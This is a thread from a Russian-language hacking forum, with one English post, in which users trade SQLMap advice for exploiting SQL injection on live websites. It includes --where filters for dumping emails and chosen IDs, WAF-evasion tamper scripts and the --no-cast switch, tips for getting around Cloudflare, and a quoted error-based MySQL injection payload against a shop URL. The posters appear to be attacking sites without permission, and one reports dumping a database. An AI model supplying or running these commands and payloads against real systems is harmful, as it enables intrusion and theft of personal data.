Вопросы по SQLMap

Discussion in 'Уязвимости' started by randman, 1 Oct 2015.

  1. Baskin-Robbins

    Baskin-Robbins Reservists Of Antichat

    Joined:
    15 Sep 2018
    Messages:
    239
    Likes Received:
    809
    Reputations:
    212
    where=Type != NULL
    или так
    where=Type != ''
     
    #921 Baskin-Robbins, 13 Sep 2019
    Last edited: 14 Sep 2019
    Estet likes this.
  2. Estet

    Estet New Member

    Joined:
    30 Aug 2016
    Messages:
    33
    Likes Received:
    2
    Reputations:
    0
    Спасибо за помощь. Еще один, последний вопрос.
    Можно ли как то указать подобную конструкцию [email protected]
    Тоесть сдампить по электронке на указаном домене?
     
  3. Baskin-Robbins

    Baskin-Robbins Reservists Of Antichat

    Joined:
    15 Sep 2018
    Messages:
    239
    Likes Received:
    809
    Reputations:
    212
    --where=email LIKE '%@site.com'
    но не уверен, сейчас проверил на sqlmap - не хочет работать, хотя вручную все работает
     
    #923 Baskin-Robbins, 14 Sep 2019
    Last edited: 14 Sep 2019
    Estet likes this.
  4. Estet

    Estet New Member

    Joined:
    30 Aug 2016
    Messages:
    33
    Likes Received:
    2
    Reputations:
    0
    да к сожалению не работает( но все равно спасибо
     
  5. pacojaveh

    pacojaveh New Member

    Joined:
    14 Sep 2019
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Всем привет,помогите пожалуйста ситуация такая:
    Appspider(Rapid7) находит sql уязвимость "Double-float overflow" отправляя значение "1e309" как данные POST запросом,в ответе Mysql2::Error: Unknown column 'Infinity' in 'field list': INSERT INTO `interactions` (`accept_langs`, `browser`, `browser_version`....перечисление всех колонок) при ЛЮБЫХ других значениях кроме "1e309(и выше 1e310..)" ошибки НЕТ,sqlmap не может раскрутить ее,пробовал фазерам через owasp большим списком также ошибок других не нашлось реакция только на 1e309.
    И из всего этого вопрос как ее раскрутить в sqlmap?готов оплатить за помощь если кто знает как решить,моя телега @S920799
     
  6. karkajoi

    karkajoi Well-Known Member

    Joined:
    26 Oct 2016
    Messages:
    488
    Likes Received:
    459
    Reputations:
    8
    --where="email='[email protected]'" так будет работать
     
    Baskin-Robbins likes this.
  7. RWD

    RWD Member

    Joined:
    25 Apr 2013
    Messages:
    157
    Likes Received:
    41
    Reputations:
    2
    Попробуйте no-cast, еще можно с таким тампером поробовать tamper=between, space2comment
     
  8. karkajoi

    karkajoi Well-Known Member

    Joined:
    26 Oct 2016
    Messages:
    488
    Likes Received:
    459
    Reputations:
    8
    1) крутить руками
    2) искать реальный IP сайта

    З.Ы если там правильно настроен клауд, то скулю будет сложно раскрутить, паблик методов обхода клауда при sqli я не видел (только старые методы которые уже не катят)
     
  9. karkajoi

    karkajoi Well-Known Member

    Joined:
    26 Oct 2016
    Messages:
    488
    Likes Received:
    459
    Reputations:
    8
    Ну тогда 1е 2 варианта. Если скуля не слепая, то руками крутануть
    P.S Мапа в последнее время херово видит скули почему-то. Приходится все чаще делать все в ручном режиме, либо искать другой софт
     
  10. Estet

    Estet New Member

    Joined:
    30 Aug 2016
    Messages:
    33
    Likes Received:
    2
    Reputations:
    0
    заранее сори за глупый вопрос, вот так бывает... )

    есть несколько значений id = 2421,12412,41241,4121 которые мне нужны
    как с командой --where извлечь только эти ID ?
    думал --where=id=2421,12412,41241,4121
    вероятно не запятая между значениями нужна ))
     
    #930 Estet, 19 Sep 2019
    Last edited: 20 Sep 2019
  11. joelblack

    joelblack Reservists Of Antichat

    Joined:
    6 Jul 2015
    Messages:
    244
    Likes Received:
    450
    Reputations:
    145
    Code:
    --where "id IN (1,3)"
     
    Imperou$ and Estet like this.
  12. pacojaveh

    pacojaveh New Member

    Joined:
    14 Sep 2019
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Попробуй
    https://rhinosecuritylabs.com/aws/bypassing-ip-based-blocking-aws/
     
  13. Imperou$

    Imperou$ Elder - Старейшина

    Joined:
    23 May 2008
    Messages:
    90
    Likes Received:
    42
    Reputations:
    0
  14. sosidzh24

    sosidzh24 Member

    Joined:
    10 Apr 2019
    Messages:
    176
    Likes Received:
    7
    Reputations:
    0
    сканер определил уязвимую ссылку и базу данных, имеет вид plants/?sFilterProperties=1 procedure analyse(extractvalue(rand(),concat(0x3a,CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)))),1)-- 1&sPage=1&sPerPage=12 Но sqlmap отказывается брать этот сайт.Какую технику использовать чтобы направить его в нужное направление?
     
  15. NewbieOnHack

    NewbieOnHack New Member

    Joined:
    28 Sep 2019
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Всем привет форумчане, кто может обьяснить, что делает --no-cast? Заранее спасибо. И почему при нормализации в --hex не дает базу и сыпятся запросы(блочит ваф), а при --no-cast я спокойно получил базу и дамплю сейчас!)
     
    #935 NewbieOnHack, 28 Sep 2019
    Last edited: 28 Sep 2019
  16. RWD

    RWD Member

    Joined:
    25 Apr 2013
    Messages:
    157
    Likes Received:
    41
    Reputations:
    2

    https://github.com/sqlmapproject/sqlmap/wiki/Usage

    Turn off payload casting mechanism
    Switch: --no-cast

    When retrieving results, sqlmap uses a mechanism where all entries are being casted to string type and replaced with a whitespace character in case of NULL values. That is being made to prevent any erroneous states (e.g. concatenation of NULL values with string values) and to easy the data retrieval process itself. Nevertheless, there are reported cases (e.g. older versions of MySQL DBMS) where this mechanism needed to be turned-off (using this switch) because of problems with data retrieval itself (e.g. None values are returned back).
     
  17. NewbieOnHack

    NewbieOnHack New Member

    Joined:
    28 Sep 2019
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Спасибо, но я не понял почему я обошел фильтр этим методом(при sql запросе в url строку получал 504, что означало, что коннект дропает фильтр)
     
  18. 4sh0T

    4sh0T New Member

    Joined:
    3 Oct 2019
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    hello everyone, I'm sorry for not being able to speak Russian. I can translate if necessary but I thought I'd try it in english first.
    I got a site which is vulnerable to SQL injection, however whatever I try it doesn't exploit the vulnerability. Also the WAF blocks some payloads, so I used Atlas(https://github.com/m4ll0k/Atlas) to identify the WAF, but it didn't manage to identify it, however it suggested me some tampers to use before the WAF blocked my IP. This is the response I get when I manually type in ' behind this site:

    https://www.site.xx/xxxx/product.php?id=47' (I enter the ' myself)

    "MySQL error: 1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\\\' AND p.products_status = 1 GROUP BY p.products_id' at line 1

    SELECT * FROM products AS p LEFT JOIN products_description AS pd ON p.products_id=pd.products_id WHERE p.products_id = 47\\\' AND p.products_status = 1 GROUP BY p.products_id

    TEP_DB_ERROR"

    command used:
    sqlmap -u https://www.site.xx/xxxx/product.php?id=47 --random-agent --level=5 --risk=3 --dbs --tamper=htmlencode,charunicodeencode,modsecurityversioned,modsecurityzeroversioned,multiplespaces

    Anyone knows how I could exploit?
     
  19. sosidzh24

    sosidzh24 Member

    Joined:
    10 Apr 2019
    Messages:
    176
    Likes Received:
    7
    Reputations:
    0
    --level 5 --risk 3 -v 3 --random-agent
     
  20. sosidzh24

    sosidzh24 Member

    Joined:
    10 Apr 2019
    Messages:
    176
    Likes Received:
    7
    Reputations:
    0
    all tested parameters do not appear to be injectable. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'
    There are no errors in payloads